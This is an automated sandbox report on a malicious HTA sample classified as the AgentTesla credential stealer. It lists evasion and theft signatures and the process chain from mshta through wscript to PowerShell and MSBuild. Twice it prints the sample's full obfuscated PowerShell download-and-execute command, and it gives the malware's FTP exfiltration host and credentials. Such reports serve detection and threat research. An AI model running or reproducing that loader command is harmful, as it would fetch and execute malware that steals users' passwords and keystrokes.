Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
morninghtaaaafilex.hta

Overview

General Information

Sample name:morninghtaaaafilex.hta
Analysis ID:1629094
MD5:38191fe427e709654ac305d6523ab9bb
SHA1:fdbb42e07425f82a53594ada0839cc8cd9624a3c
SHA256:5acc5fb8b248445eec0f184a6a74a2a715646ebbfa1e53ba67fed6321eddd191
Tags:htauser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Legitimate Application Dropped Script
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7404 cmdline: mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7512 cmdline: wscript //nologo "C:\Windows\Temp\octupole.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • timeout.exe (PID: 7520 cmdline: timeout /t 1 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.rvoccte.com", "Username": "mybloddycockcpanel_owner@rvoccte.com", "Password": "ft]@0i!$%!ho"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\octupole.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34647:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x346b9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34743:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x347d5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3483f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x348b1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34947:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x349d7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  8.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x31783:$s2: GetPrivateProfileString
                  • 0x30d7a:$s3: get_OSFullName
                  • 0x32505:$s5: remove_Key
                  • 0x326e8:$s5: remove_Key
                  • 0x335e8:$s6: FtpWebRequest
                  • 0x34629:$s7: logins
                  • 0x34b9b:$s7: logins
                  • 0x3787e:$s7: logins
                  • 0x3795e:$s7: logins
                  • 0x392b1:$s7: logins
                  • 0x384f8:$s9: 1.85 (Hash, version 2, native byte-order)
                  5.2.powershell.exe.5e0e358.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 7 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi32_7624.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi32_7624.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Base64 Encoded PowerShell Command Detected
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); In
                        Sigma detected: Legitimate Application Dropped Script
                        Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7404, TargetFilename: C:\Windows\Temp\misdivide.bat
                        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); In
                        Sigma detected: Script Initiated Connection to Non-Local Network
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
                        Sigma detected: Silenttrinity Stager Msbuild Activity
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7784, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                        Sigma detected: Suspicious MSHTA Child Process
